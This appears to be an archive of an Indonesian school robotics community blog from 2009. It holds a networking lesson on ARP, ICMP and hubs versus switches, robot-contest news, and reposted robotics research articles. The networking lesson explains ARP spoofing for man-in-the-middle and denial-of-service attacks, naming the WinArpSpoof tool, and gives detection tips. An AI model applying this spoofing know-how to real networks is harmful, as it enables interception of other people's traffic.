Minggu, 27 Desember 2009

1 komentar
1. Address Resolution Protocol disingkat ARP

Address Resolution Protocol disingkat ARP adalah sebuah protokol dalam TCP/IP Protocol Suite yang bertanggungjawab dalam melakukan resolusi alamat IP ke dalam alamat Media Access Control (MAC Address). ARP didefinisikan di dalam RFC 826.
Ketika sebuah aplikasi yang mendukung teknologi protokol jaringan TCP/IP mencoba untuk mengakses sebuah host TCP/IP dengan menggunakan alamat IP, maka alamat IP yang dimiliki oleh host yang dituju harus diterjemahkan terlebih dahulu ke dalam MAC Address agar frame-frame data dapat diteruskan ke tujuan dan diletakkan di atas media transmisi (kabel, radio, atau cahaya), setelah diproses terlebih dahulu oleh Network Interface Card (NIC). Hal ini dikarenakan NIC beroperasi dalam lapisan fisik dan lapisan data-link pada tujuh lapis model referensi OSI dan menggunakan alamat fisik daripada menggunakan alamat logis (seperti halnya alamat IP atau nama NetBIOS) untuk melakukan komunikasi data dalam jaringan.


Jika memang alamat yang dituju berada di luar jaringan lokal, maka ARP akan mencoba untuk mendapatkan MAC address dari antarmuka router lokal yang menghubungkan jaringan lokal ke luar jaringan (di mana komputer yang dituju berada) [1]

IP dan MAC (Media Access Control) address merupakan elemen dalam protokol ARP yang digunakan untuk pengalamatan dalam jaringan komputer. Ketika satu komputer masuk ke dalam jaringan, ia akan mengumumkan kehadirannya kepada semua komputer dalam jaringan (melakukan broadcast) melalui nomor IP dan MAC address-nya, atau sering disebut dengan istilah hardware address.

Address Resolution Protocol

Informasi tentang MAC address akan disimpan dalam keping RAM (Random Access Memory) dan sifatnya temporer dengan umurnya yang hanya dua menit, namun dapat diperbarui. Ruang simpan dalam RAM ini disebut ARP (Address Resolution Protocol) cache. ARP akan selalu memeriksa ARP cache. Jika ARP berhasil menemukan nomor IP tetapi tidak menemukan MAC address pasangannya, maka ARP akan mengirim request ke jaringan.

Prinsip dari ARP adalah tidak boleh ada lebih dari satu nomor IP memakai satu MAC address yang sama. Jadi, kita tidak bisa menggunakan nomor IP yang sedang dipakai oleh komputer lain, dan tidak bisa menggunakan MAC address yang telah dipasangkan dengan IP lain.

Protokol ARP bersifat stateless, ia akan mengirim request MAC address dan mengirimkan pemberitahuan kepada komputer anggota jaringan jika terjadi ketidakberesan dalam pengalamatan, walaupun tidak ada komputer di jaringan yang memintanya. Protokol ARP juga bersifat non-routable, ia hanya bekerja pada satu segmen jaringan lokal.

ARP Spoofing

Ancaman keamanan muncul ketika ada upaya manipulasi terhadap pengalamatan nomor IP dan MAC address. Proses ini biasa disebut dengan istilah ARP spoofing atau ARP poisoning, bertujuan untuk mencari mana saja komputer yang terhubung dengan koneksi terbuka (saling percaya). Misalnya, komputer B dengan alamat hardware BB:BB percaya terhadap komputer C yang beralamat hardware CC:CC. Komputer penyerang ada di komputer A dengan MAC address AA:AA. Maka, penyerang akan berupaya mengirimkan pemberitahuan kepada komputer B bahwa MAC address komputer C adalah AA:AA.
Salah satu contoh aplikasi yang dapat digunakan untuk memanipulasi MAC address adalah WinArpSpoof. Sebelum mengistalnya, terlebih dulu kita harus menginstal paket WinCap untuk menangkap paket data di jaringan.

Payahnya, sistem operasi selalu mengecek ARP cache dan akan mengirim request pengalamatan jika terjadi perubahan, atau jika ia mendeteksi adanya lebih dari satu IP dengan MAC address yang sama dalam ARP cache. Untuk menghentikan proses ini, biasanya cracker akan membuat program untuk menjawab bahwa tidak ada perubahan dalam ARP cache.

Dengan ARP spoofing, penyerang dapat mengatur lalu lintas data pada jaringan. Paket data yang dikirim target B ke target C akan berbelok dahulu ke komputer penyerang (komputer A). Setelah mengetahui isi data, bisa saja si penyerang mengirim pesan palsu ke komputer C, seakan-akan berasal dari komputer B. Model serangan semacam ini dikenal dengan istilah "man the middle attack". Lain jadinya, jika penyerang memasangkan MAC address yang tidak dikenal di dalam jaringan kepada komputer target. Ini akan menyebabkan komputer target tidak dikenali oleh jaringan dan akan mengalami penolakan saat mengirim request layanan, istilahnya "denial of service (DoS)".
Untuk mengetahui terjadinya upaya spoofing, kita bisa mengecek isi routing table menggunakan protokol Reverse ARP (RARP). Jika ada lebih dari satu alamat IP menggunakan MAC address yang sama, kemungkinan terjadi sesuatu yang tidak beres. Jika tidak ada yang salah dengan routing table, kita bisa mengirim paket ICMP (Internet Control Message Control) atau yang dikenal dengan ping ke komputer. Jika muncul pesan error (unreachable), kita harus curiga dan segera menyelidiki sistem.
Protokol ARP dapat dimanipulasi untuk tujuan jahat, namun juga dapat dimanfaatkan untuk tujuan yang baik. Contohnya untuk mengecek keanggotaan dalam suatu fasilitas akses internet. Sekarang banyak orang mengakses internet melalui jaringan Wi-Fi yang memanfaatkan gelombang radio. Di jaringan tersebut, protokol ARP bisa digunakan untuk mengecek MAC address komputer-komputer yang terhubung dengan internet. (PCplus, 292) [2]
Internet Control Message Protocol
Internet Control Message Protocol (ICMP) adalah salah satu protokol inti dari keluarga protokol internet. ICMP utamanya digunakan oleh sistem operasi komputer jaringan untuk mengirim pesan kesalahan yang menyatakan, sebagai contoh, bahwa komputer tujuan tidak bisa dijangkau.
ICMP berbeda tujuan dengan TCP dan UDP dalam hal ICMP tidak digunakan secara langsung oleh aplikasi jaringan milik pengguna. salah satu pengecualian adalah aplikasi ping yang mengirim pesan ICMP Echo Request (dan menerima Echo Reply) untuk menentukan apakah komputer tujuan dapat dijangkau dan berapa lama paket yang dikirimkan dibalas oleh komputer tujuan. [3]
Hub vs switch


Gambar: Sebuah hub hanya mengulang semua trafik ke semua port, sementara switch akan membuat sambungan sementara antara port yang membutuhkan komunikasi.
Hub dianggap perangkat yang sederhana, karena hub secara tidak efisien membroadcast semua trafik ke setiap port. Kesederhanaan ini menyebabkan penalty dari sisi kinerja maupun keamanan. Secara keseluruhan kinerja menjadi lebih lambat, karena bandwidth yang tersedia harus dibagi antara semua port. Karena semua lalu lintas terlihat oleh semua port, semua host di jaringan dapat dengan mudah memantau seluruh lalu lintas jaringan.
Switch membuat sambungan virtual antara port penerima dan pengirim. Ini menghasilkan kinerja yang lebih baik karena banyak sambungan virtual dapat dibangun secara bersamaan. Switch yang lebih mahal dapat men-switch trafik dengan menginspeksi paket di tingkat yang lebih tinggi (di lapisan aplikasi atau lapisan transport), memungkinkan pembuatan VLAN, melaksanakan dan fitur tingkat lanjutan lainnya.
Sebuah hub dapat digunakan jika dibutuhkan pengulangan traffik ke semua port; misalnya, bila anda ingin sebuah mesin melakukan pemantauan untuk melihat semua lalu lintas pada jaringan. Kebanyakan switch menyediakan fungsi untuk memonitor port yang memungkinkan pengulangan traffik dari sebuah port tertentu yang ditugaskan secara khusus untuk tujuan ini.
Hub lebih murah daripada switch. Namun, harga akan berkurang secara drastis di tahun-tahun belakangan ini. Oleh karena itu, jaringan yang menggunakan hub lama sebaiknya diganti dengan switch yang baru jika memungkinkan.
Hub dan switch mungkin menawarkan layanan yang dikelola (managed servis). Beberapa dari layanan ini meliputi kemampuan untuk mengatur kecepatan link (10baseT, 100baseT, 1000baseT, full duplex atau half duplex) per port, memungkinkan untuk memperhatikan kejadian di jaringan (seperti perubahan alamat MAC atau paket yang tidak baik / salah), dan biasanya termasuk penghitung trafik pada port untuk memudahkan bandwidth akunting. Sebuah managed switch yang menyediakan perhitungan upload dan download byte untuk setiap port fisik sehingga dapat sangat menyederhanakan pemantauan jaringan. Layanan ini biasanya tersedia melalui SNMP, atau dapat diakses melalui telnet, ssh, interface web, atau alat konfigurasi khusus. [4]

Daftar Pustaka:
[1] http://id.wikipedia.org/wiki/Address_Resolution_Protocol
[2] http://www.bestlib.co.cc/2009/07/mengenal-address-resolution-protocol.html
[3] http://id.wikipedia.org/wiki/Internet_Control_Message_Protocol
[4] http://opensource.telkomspeedy.com/wiki/index.php/WNDW:_Hub_vs._Switch

Kamis, 24 Desember 2009

2 komentar
[ Minggu, 20 Desember 2009 ]
Dari Jawa Timur Robot Contest 2009 di PENS-ITS
Pilih Robot Analog karena Pembuatannya Mudah

Berbagai jenis robot kemarin (19/12) diadu di Politeknik Elektronika Negeri Surabaya-Institut Teknologi Sepuluh Nopember (PENS-ITS). Tidak hanya karya mahasiswa, tetapi juga karya para pelajar SMA --bahkan SD-- dari berbagai sekolah di Jawa Timur.

---

PULUHAN robot jenis line tracer (pengikut garis) mengikuti Jawa Timur Robot Contest 2009 di PENS-ITS kemarin (19/12). Robot-robot tersebut merupakan karya siswa SD hingga perguruan tinggi dari berbagai daerah di Jatim. Selain itu, ada peserta yang datang dari Jogjakarta dan Solo. Kemarin merupakan babak penyisihan. Babak final dilaksanakan hari ini.

Acara yang diselenggarakan oleh Himpunan Mahasiswa PENS-ITS itu diikuti 205 tim. Rinciannya, 140 tim pelajar, 22 tim mahasaiswa PENS angkatan 2009, dan 43 tim dari mahasiswa umum. "Kami ingin mengenalkan robotika sejak kecil," kata Ketua Panitia Jawa Timur Robot Contest 2009 Satriyo Utomo kemarin.

Robot-robot itu beradu kecepatan melewati sirkuit yang sudah ditentukan. Robot line tracer yang dilombakan kali ini adalah jenis analog dan mikro. "Kebanyakan pelajar beradu line tracer yang analog," ujar Satriyo.

Selain lebih mudah, pem­ro­gram­an jenis analog itu tidak terlalu rumit. "Tinggal beli alat dan sensor," imbuhnya. Untuk line tracer mikro, pemrograman langsung dikerjakan di komputer sehingga kendali ada pada komputer yang dioperasikan oleh anggota tim.

Peserta asal SMPN 6 Surabaya Baskhoro Satriyo termasuk yang memilih robot jenis analog. "Robot ini gampag dibuat dan dioperasikan," tuturnya. Dia me­nu­turkan bahwa line tracer ter­sebut dibuat oleh para murid yang ikut serta dalam ekstrakurikuler robotika di sekolah.

Hal yang sama diakui oleh Fah­ruzul Fahmi, peserta dari SD Islam Raudhatul Jannah. "Aku baru ikut ekstra robotika tahun ini," ujarnya. Menurut dia, minatnya pada ro­bo­tika difasilitasi oleh sekolah de­ngan mendatangkan trainer untuk me­latih siswa belajar tentang ro­bot. Setiap minggu mereka diberi wak­tu khusus untuk belajar dan mengenal lebih dalam tentang robotika.

Salah seorang guru SD Islam Raudlatul Jannah Siti Aisyah mengatakan, sekolah sengaja mengembangkan robot dengan mengundang trainer khusus dari mahasiswa ITS. "Banyak anak-anak yang tertarik," ujarnya.

Bahkan, ekstrakurikuler robotika menjadi salah satu kegiatan favorit anak didiknya. Sekolah tersebut mengirimkan dua tim, yakni Suroboter dan Junior Roboter. "Robotika bagus untuk anak-anak," tuturnya. Keinginan bermain bagi anak-anak bisa disisipkan lewat belajar tentang robot. (upik dyah eka noviyanti/tom)

Jumat, 23 Oktober 2009

Robotic NEWS !!

0 komentar

Scientists Create Robot Surrogate For Blind Persons In Testing Visual Prostheses

(Oct. 20, 2009) — Scientists at the California Institute of Technology (Caltech) have created a remote-controlled robot that is able to simulate the "visual" experience of a blind person who has been implanted with a visual prosthesis, such as an artificial retina. An artificial retina consists of a silicon chip studded with a varying number of electrodes that directly stimulate retinal nerve cells. It is hoped that this approach may one day give blind persons the freedom of independent mobility.


The CYCLOPS mobile robotic platform is designed to be used as a surrogate for blind persons in the testing of visual prostheses. (Credit: Caltech/Wolfgang Fink, Mark Tarbell)

The robot—or, rather, the mobile robotic platform, or rover—is called CYCLOPS. It is the first such device to emulate what the blind can see with an implant, says Wolfgang Fink, a visiting associate in physics at Caltech and the Edward and Maria Keonjian Distinguished Professor in Microelectronics at the University of Arizona. Its development and potential uses are described in a paper recently published online in the journal Computer Methods and Programs in Biomedicine.

An artificial retina, also known as a retinal prosthesis, may use either an internal or external miniature camera to capture images. The captured images then are processed and passed along to the implanted silicon chip's electrode array. (Ongoing work at Caltech's Visual and Autonomous Exploration Systems Research Laboratory by Fink and Caltech visiting scientist Mark Tarbell has focused on the creation and refinement of these image-processing algorithms.) The chip directly stimulates the eye's functional retinal ganglion cells, which carry the image information to the vision centers in the brain.

CYCLOPS fills a void in the process of testing visual prostheses, explains Fink. "How do you approximate what the blind can see with the implant so you can figure out how to make it better?" he asks.

One way is to test potential enhancements on a blind person who has been given an artificial retina. And, indeed, the retinal implant research team does this often, and extensively. But few people worldwide have been implanted with retinal prostheses, and there is only so much testing they can be asked to endure.

Another way is to give sighted people devices that downgrade their vision to what might be expected using artificial vision prostheses. And this, too, is often done. But it's a less-than-ideal solution since the brain of a sighted person is adept at taking poor-quality images and processing them in various ways, adding detail as needed. This processing is what allows most people to see in dim light, for example, or through smoke or fog.

"A sighted person's objectivity is impaired," Fink says. "They may not be able to get to the level of what a blind person truly experiences."

Enter one more possible solution: CYCLOPS. "We can use CYCLOPS in lieu of a blind person," Fink explains. "We can equip it with a camera just like what a blind person would have with a retinal prosthesis, and that puts us in the unique position of being able to dictate what the robot receives as visual input."

Now, if scientists want to see how much better the resolution is when a retinal prosthesis has an array of 50 pixels as opposed to 16 pixels, they can try both out on CYCLOPS. They might do this by asking the robot to follow a black line down a white-tiled hallway, or seeing if it can find—and enter—a darkened doorway.

"We're not quite at that stage yet," Fink cautions, referring to such independent maneuvering.

CYCLOPS's camera is gimballed, which means it can emulate left-to-right and up-and-down head movements. The input from the camera runs through the onboard computing platform, which does real-time image processing. For now, however, the platform itself is moved around remotely, via a joystick. "The platform can be operated from anywhere in the world, through its wireless Internet connection," says Tarbell.

"We have the image-processing algorithms running locally on the robot's platform—but we have to get it to the point where it has complete control of its own responses," Fink says.

Once that's done, he adds, "we can run many, many tests without bothering the blind prosthesis carriers."

Among the things they hope to learn from such testing is how to enhance a workplace or living environment to make it more accessible to a blind person with a particular vision implant. If CYCLOPS can use computer-enhanced images from a 50-pixel array to make its way safely through a room with a chair in one corner, a sofa along the wall, and a coffee table in the middle, then there is a good chance that a blind person with a 50-pixel retinal prosthesis would be able to do the same.

The results of tests on the CYCLOPS robot should also help researchers determine whether a particular version of a prosthesis, say, or its onboard image-processing software, are even worth testing in blind persons. "We'll be coming in with a much more educated initial starting point, after which we'll be able to see how blind people work with these implants," Fink notes.

And the implants need to work well. After all, Fink points out, "Blind people using a cane or a canine unit can move around impressively well. For an implant to be useful, it has to have the implicit promise that it will surpass these tools. The ultimate promise—the hope—is that we instill in them such useful vision that they can attain independent mobility, can recognize people, and can go about their daily lives."

The work done in the paper by Fink and Tarbell, "CYCLOPS: A mobile robotic platform for testing and validating image processing and autonomous navigation algorithms in support of artificial vision prostheses," was supported by a grant from the National Science Foundation. Fink and Tarbell have filed a provisional patent on the technology on behalf of Caltech.


Adapted from materials provided by California Institute of Technology, via EurekAlert!, a service of AAAS.

Swimming Robot Makes Waves At Bath

(Sep. 25, 2009) — Researchers at the University of Bath have used nature for inspiration in designing a new type of swimming robot which could bring a breakthrough in submersible technology.


Postgraduate researchers Keri Collins and Ryan Ladd developed the Gymnobot. It is powered by a fin that runs the length of the underside of its rigid body; this undulates to make a wave in the water which propels the robot forwards. (Credit: Image courtesy of University of Bath)

Conventional submarine robots are powered by propellers that are heavy, inefficient and can get tangled in weeds.

In contrast ‘Gymnobot', created by researchers from the Ocean Technologies Lab in the University's Department of Mechanical Engineering, is powered by a fin that runs the length of the underside of its rigid body; this undulates to make a wave in the water which propels the robot forwards.

The design, inspired by the Amazonian knifefish, is thought to be more energy efficient than conventional propellers and allows the robot to navigate shallow water near the sea shore.

Gymnobot could be used to film and study the diverse marine life near the seashore, where conventional submersible robots would have difficulty manoeuvring due to the shallow water with its complex rocky environment and plants that can tangle a propeller.

Dr William Megill, Lecturer in Biomimetics at the University of Bath, explained: "The knifefish has a ventral fin that runs the length of its body and makes a wave in the water that enables it to easily swim backwards or forwards in the water.

"Gymnobot mimics this fin and creates a wave in the water that drives it forwards. This form of propulsion is potentially much more efficient than a conventional propeller and is easier to control in shallow water near the shore."

Keri Collins, a postgraduate student who developed the Gymnobot as part of her PhD, added: "We hope to observe how the water flows around the fin in later stages of the project. In particular we want to look at the creation and development of vortices around the fin.

"Some fish create vortices when flicking their tails one way but then destroy them when their tails flick back the other way. By destroying the vortex they are effectively re-using the energy in that swirling bit of water. The less energy left in the wake when the fish has passed, the less energy is wasted.

"It will be particularly interesting to see how thrust is affected by changing the wave of the fin from a constant amplitude to one that is tapered at one end."

The lab was recently awarded a grant to work with six other European institutions to create a similar robot that reacts to water flow and is able to swim against currents.

In addition to studying biodiversity near the shore and in fast-flowing rivers, robots like Gymnobot could also be used for detecting pollution in the environment or for inspecting structures such as oil rigs.

The project was funded by BMT Defence Services and the Engineering & Physical Sciences Research Council.


Adapted from materials provided by University of Bath, via AlphaGalileo.

Research Teams Successfully Operate Multiple Biomedical Robots From Numerous Locations

ScienceDaily (Sep. 18, 2009) — Using a new software protocol called the Interoperable Telesurgical Protocol, nine research teams from universities and research institutes around the world recently collaborated on the first successful demonstration of multiple biomedical robots operated from different locations in the U.S., Europe, and Asia. SRI International operated its M7 surgical robot for this demonstration.


SRI M7 system. (Credit: Image courtesy of SRI International)

In a 24-hour period, each participating group connected over the Internet and controlled robots at different locations. The tests performed demonstrated how a wide variety of robot and controller designs can seamlessly interoperate, allowing researchers to work together easily and more efficiently. In addition, the demonstration evaluated the feasibility of robotic manipulation from multiple sites, and was conducted to measure time and performance for evaluating laparoscopic surgical skills.

New Interoperable Telesurgical Protocol The new protocol was cooperatively developed by the University of Washington and SRI International, to standardize the way remotely operated robots are managed over the Internet.

"Although many telemanipulation systems have common features, there is currently no accepted protocol for connecting these systems," said SRI's Tom Low. "We hope this new protocol serves as a starting point for the discussion and development of a robust and practical Internet-type standard that supports the interoperability of future robotic systems."

The protocol will allow engineers and designers that usually develop technologies independently, to work collaboratively, determine which designs work best, encourage widespread adoption of the new communications protocol, and help robotics research to evolve more rapidly. Early adoption of this protocol internationally will encourage robotic systems to be developed with interoperability in mind, and avoid future incompatibilities.

"We're very pleased with the success of the event in which almost all of the possible connections between operator stations and remote robots were successful. We were particularly excited that novel elements such as a simulated robot and an exoskeleton controller worked smoothly with the other remote manipulation systems," said Professor Blake Hannaford of the University of Washington.

The demonstration included the following organizations:

  • SRI International, Menlo Park, Calif., USA
  • University of Washington Biorobotics Lab (BRL), Seattle, Washington, USA
  • University of California at Santa Cruz (UCSC), Bionics Lab, Santa Cruz, Calif., USA
  • iMedSim, Interactive Medical Simulation Laboratory, Rensselaer Polytechnic Institute, Troy, New York, USA
  • Korea University of Technology (KUT) BioRobotics Lab, Cheonan, South Chungcheong, South Korea
  • Imperial College London (ICL), London, England
  • Johns Hopkins University (JHU), Baltimore, Maryland, USA
  • Technische Universität München (TUM), Munich, Germany
  • Tokyo Institute of Technology (TOK), Tokyo, Japan

For more information regarding availability of the Interoperable Telesurgical Protocol, please visit: http://brl.ee.washington.edu/Research_Active/Interoperability/index.php/Main_Page


Adapted from materials provided by SRI Internationa




Sabtu, 10 Oktober 2009

2 komentar




We're the champion!!!!
Pemenang robot sumo juara 1 di stikom dan juara 3 robot line tracer
makasih buat dukungan doa teman2 selama ini,,,,
semua ni bukan hanya karena kerja keras kita saja,,,,
tapi karena Tuhan yang memberikan jalan yang terbaik buat kita smua,,,, dan rencana yang terindah buat kita smua,,,,
rendah hati,,, rendah hati,,dan rendah hati,,,,,
amin,,,,

foto : pemenang juara 1 robot sumo dan juara 3 robot line tracer


Kamis, 03 September 2009

0 komentar
Karena untuk kepentingan pembelajaran robo micro DAPAT DI
download tutorial pemrograman C/C++ >>> [ Download ]


1 komentar
Terimakasih atas dukungan dan kerjasama anda para roboholic dan semua orang yang membantu perkembangan komunitas ini terutama mas Burhan dan mas Andhik !!! :D

find the future here


Sabtu, 13 Juni 2009

Welcome to 20 Roboholic Community

3 komentar




Roboholic news!!!

Bagi tim 20 roboholic dapat mengakses indo-code.com untuk mempelajari dasar2 bahasa pmrogrAman C/C++


Human-like Vision Lets Robots Navigate Naturally

ScienceDaily (July 17, 2009) — A robotic vision system that mimics key visual functions of the human brain promises to let robots manoeuvre quickly and safely through cluttered environments, and to help guide the visually impaired.


An inside view of VisGuide with the electronic circuits on main board. The video signals are sent via cables to a light- weight micro-PC that is carried for the user. (Credit: Decisions in Motion Project (www.decisionsinmotion.org))

It’s something any toddler can do – cross a cluttered room to find a toy.

It's also one of those seemingly trivial skills that have proved to be extremely hard for computers to master. Analysing shifting and often-ambiguous visual data to detect objects and separate their movement from one’s own has turned out to be an intensely challenging artificial intelligence problem.

Three years ago, researchers at the European-funded research consortium Decisions in Motion (http://www.decisionsinmotion.org/) decided to look to nature for insights into this challenge.

In a rare collaboration, neuro- and cognitive scientists studied how the visual systems of advanced mammals, primates and people work, while computer scientists and roboticists incorporated their findings into neural networks and mobile robots.

The approach paid off. Decisions in Motion has already built and demonstrated a robot that can zip across a crowded room guided only by what it “sees” through its twin video cameras, and are hard at work on a head-mounted system to help visually impaired people get around.

“Until now, the algorithms that have been used are quite slow and their decisions are not reliable enough to be useful,” says project coordinator Mark Greenlee. “Our approach allowed us to build algorithms that can do this on the fly, that can make all these decisions within a few milliseconds using conventional hardware.”

How do we see movement?

The Decisions in Motion researchers used a wide variety of techniques to learn more about how the brain processes visual information, especially information about movement.

These included recording individual neurons and groups of neurons firing in response to movement signals, functional magnetic resonance imaging to track the moment-by-moment interactions between different brain areas as people performed visual tasks, and neuropsychological studies of people with visual processing problems.

The researchers hoped to learn more about how the visual system scans the environment, detects objects, discerns movement, distinguishes between the independent movement of objects and the organism’s own movements, and plans and controls motion towards a goal.

One of their most interesting discoveries was that the primate brain does not just detect and track a moving object; it actually predicts where the object will go.

“When an object moves through a scene, you get a wave of activity as the brain anticipates its trajectory,” says Greenlee. “It’s like feedback signals flowing from the higher areas in the visual cortex back to neurons in the primary visual cortex to give them a sense of what’s coming.”

Greenlee compares what an individual visual neuron sees to looking at the world through a peephole. Researchers have known for a long time that high-level processing is needed to build a coherent picture out of a myriad of those tiny glimpses. What's new is the importance of strong anticipatory feedback for perceiving and processing motion.

“This proved to be quite critical for the Decisions in Motion project,” Greenlee says. “It solves what is called the ‘aperture problem’, the problem of the neurons in the primary visual cortex looking through those little peepholes.”

Building a better robotic brain

Armed with a better understanding of how the human brain deals with movement, the project’s computer scientists and roboticists went to work. Using off-the-shelf hardware, they built a neural network with three levels mimicking the brain’s primary, mid-level, and higher-level visual subsystems.

They used what they had learned about the flow of information between brain regions to control the flow of information within the robotic “brain”.

“It’s basically a neural network with certain biological characteristics,” says Greenlee. “The connectivity is dictated by the numbers we have from our physiological studies.”

The computerised brain controls the behaviour of a wheeled robotic platform supporting a moveable head and eyes, in real time. It directs the head and eyes where to look, tracks its own movement, identifies objects, determines if they are moving independently, and directs the platform to speed up, slow down and turn left or right.

Greenlee and his colleagues were intrigued when the robot found its way to its first target – a teddy bear – just like a person would, speeding by objects that were at a safe distance, but passing nearby obstacles at a slower pace.

”That was very exciting,” Greenlee says. “We didn’t program it in – it popped out of the algorithm.”

In addition to improved guidance systems for robots, the consortium envisions a lightweight system that could be worn like eyeglasses by visually or cognitively impaired people to boost their mobility. One of the consortium partners, Cambridge Research Systems, is developing a commercial version of this, called VisGuide.

Decisions in Motion received funding from the ICT strand of the EU’s Sixth Framework Programme for research. The project’s work was featured in a video by the New Scientist in February this year.

Robo-bats With Metal Muscles May Be Next Generation Of Remote Control Flyers

ScienceDaily (July 8, 2009) — Tiny flying machines can be used for everything from indoor surveillance to exploring collapsed buildings, but simply making smaller versions of planes and helicopters doesn't work very well. Instead, researchers at North Carolina State University are mimicking nature's small flyers – and developing robotic bats that offer increased maneuverability and performance.


Small flyers, or micro-aerial vehicles (MAVs), have garnered a great deal of interest due to their potential applications where maneuverability in tight spaces is necessary, says researcher Gheorghe Bunget. For example, Bunget says, "due to the availability of small sensors, MAVs can be used for detection missions of biological, chemical and nuclear agents." But, due to their size, devices using a traditional fixed-wing or rotary-wing design have low maneuverability and aerodynamic efficiency.

So Bunget, a doctoral student in mechanical engineering at NC State, and his advisor Dr. Stefan Seelecke looked to nature. "We are trying to mimic nature as closely as possible," Seelecke says, "because it is very efficient. And, at the MAV scale, nature tells us that flapping flight – like that of the bat – is the most effective."

The researchers did extensive analysis of bats' skeletal and muscular systems before developing a "robo-bat" skeleton using rapid prototyping technologies. The fully assembled skeleton rests easily in the palm of your hand and, at less than 6 grams, feels as light as a feather. The researchers are currently completing fabrication and assembly of the joints, muscular system and wing membrane for the robo-bat, which should allow it to fly with the same efficient flapping motion used by real bats.

"The key concept here is the use of smart materials," Seelecke says. "We are using a shape-memory metal alloy that is super-elastic for the joints. The material provides a full range of motion, but will always return to its original position – a function performed by many tiny bones, cartilage and tendons in real bats."

Seelecke explains that the research team is also using smart materials for the muscular system. "We're using an alloy that responds to the heat from an electric current. That heat actuates micro-scale wires the size of a human hair, making them contract like 'metal muscles.' During the contraction, the powerful muscle wires also change their electric resistance, which can be easily measured, thus providing simultaneous action and sensory input. This dual functionality will help cut down on the robo-bat's weight, and allow the robot to respond quickly to changing conditions – such as a gust of wind – as perfectly as a real bat."

In addition to creating a surveillance tool with very real practical applications, Seelecke says the robo-bat could also help expand our understanding of aerodynamics. "It will allow us to do tests where we can control all of the variables – and finally give us the opportunity to fully understand the aerodynamics of flapping flight," Seelecke says.

Bunget will present the research this September at the American Society of Mechanical Engineers Conference on Smart Materials, Adaptive Structures and Intelligent Systems in Oxnard, Calif.

Researchers Unveil Whiskered Robot Rat

ScienceDaily (July 5, 2009) — A team of scientists have developed an innovative robot rat which can seek out and identify objects using its whiskers. The SCRATCHbot robot will be demonstrated this week (1 July 2009) at an international workshop looking at how robots can help us examine the workings of the brain.


Researchers from the Bristol Robotics Lab, (a partnership between the University of the West of England and the University of Bristol) and the University of Sheffield have developed the SCRATCHbot, which is a significant milestone in the pan-european “ICEA” project to develop biologically-inspired artificial intelligence systems. As part of this project Professor Tony Prescott, from the University of Sheffield’s Department of Psychology, is working with the Bristol Robotics Lab to design innovative artificial touch technologies for robots that will also help us understand how the brain controls the movement of the sensory systems.

The new technology has been inspired by the use of touch in the animal kingdom. In nocturnal creatures, or those that inhabit poorly-lit places, this physical sense is widely preferred to vision as a primary means of discovering the world. Rats are especially effective at exploring their environments using their whiskers. They are able to accurately determine the position, shape and texture of objects using precise rhythmic sweeping movements of their whiskers, make rapid accurate decisions about objects, and then use the information to build environmental maps.

Robot designs often rely on vision to identify objects, but this new technology relies solely on sophisticated touch technology, enabling the robot to function in spaces such as dark or smoke-filled rooms, where vision cannot be used.

The new technology has the potential for a number of further applications from using robots underground, under the sea, or in extremely dusty conditions, where vision is often seriously compromised. The technology could also be used for tactile inspection of surfaces, such as materials in the textile industry, or closer to home in domestic products, for example vacuum cleaners that could sense textures for optimal cleaning.

Dr Tony Pipe, (BRL, UWE), says “For a long time, vision has been the biological sensory modality most studied by scientists. But active touch sensing is a key focus for those of us looking at biological systems which have implications for robotics research. Sensory systems such as rats’ whiskers have some particular advantages in this area. In humans, for example, where sensors are at the fingertips, they are more vulnerable to damage and injury than whiskers. Rats have the ability to operate with damaged whiskers and in theory broken whiskers on robots could be easily replaced, without affecting the whole robot and its expensive engineering.

“Future applications for this technology could include using robots underground, under the sea, or in extremely dusty conditions, where vision is often a seriously compromised sensory modality. Here, whisker technology could be used to sense objects and manoeuvre in a difficult environment. In a smoke filled room for example, a robot like this could help with a rescue operation by locating survivors of a fire. This research builds on previous work we have done on whisker sensing.”

Professor Prescott said: “Our project has reached a significant milestone in the development of actively-controlled, whisker-like sensors for intelligent machines. Although touch sensors are already employed in robots, the use of touch as a principal modality has been overlooked until now. By developing these biomimetic robots, we are not just designing novel touch-sensing devices, but also making a real contribution to understanding the biology of tactile sensing.”

Robot Learns To Smile And Frown

ScienceDaily (July 11, 2009) — A hyper-realistic Einstein robot at the University of California, San Diego has learned to smile and make facial expressions through a process of self-guided learning. The UC San Diego researchers used machine learning to “empower” their robot to learn to make realistic facial expressions.


“As far as we know, no other research group has used machine learning to teach a robot to make realistic facial expressions,” said Tingfan Wu, the computer science Ph.D. student from the UC San Diego Jacobs School of Engineering who presented this advance on June 6 at the IEEE International Conference on Development and Learning.

The faces of robots are increasingly realistic and the number of artificial muscles that controls them is rising. In light of this trend, UC San Diego researchers from the Machine Perception Laboratory are studying the face and head of their robotic Einstein in order to find ways to automate the process of teaching robots to make lifelike facial expressions.

This Einstein robot head has about 30 facial muscles, each moved by a tiny servo motor connected to the muscle by a string. Today, a highly trained person must manually set up these kinds of realistic robots so that the servos pull in the right combinations to make specific face expressions. In order to begin to automate this process, the UCSD researchers looked to both developmental psychology and machine learning.

Developmental psychologists speculate that infants learn to control their bodies through systematic exploratory movements, including babbling to learn to speak. Initially, these movements appear to be executed in a random manner as infants learn to control their bodies and reach for objects.

“We applied this same idea to the problem of a robot learning to make realistic facial expressions,” said Javier Movellan, the senior author on the paper presented at ICDL 2009 and the director of UCSD’s Machine Perception Laboratory, housed in Calit2, the California Institute for Telecommunications and Information Technology.

Although their preliminary results are promising, the researchers note that some of the learned facial expressions are still awkward. One potential explanation is that their model may be too simple to describe the coupled interactions between facial muscles and skin.

To begin the learning process, the UC San Diego researchers directed the Einstein robot head (Hanson Robotics’ Einstein Head) to twist and turn its face in all directions, a process called “body babbling.” During this period the robot could see itself on a mirror and analyze its own expression using facial expression detection software created at UC San Diego called CERT (Computer Expression Recognition Toolbox). This provided the data necessary for machine learning algorithms to learn a mapping between facial expressions and the movements of the muscle motors.

Once the robot learned the relationship between facial expressions and the muscle movements required to make them, the robot learned to make facial expressions it had never encountered.

For example, the robot learned eyebrow narrowing, which requires the inner eyebrows to move together and the upper eyelids to close a bit to narrow the eye aperture.

“During the experiment, one of the servos burned out due to misconfiguration. We therefore ran the experiment without that servo. We discovered that the model learned to automatically compensate for the missing servo by activating a combination of nearby servos,” the authors wrote in the paper presented at the 2009 IEEE International Conference on Development and Learning.

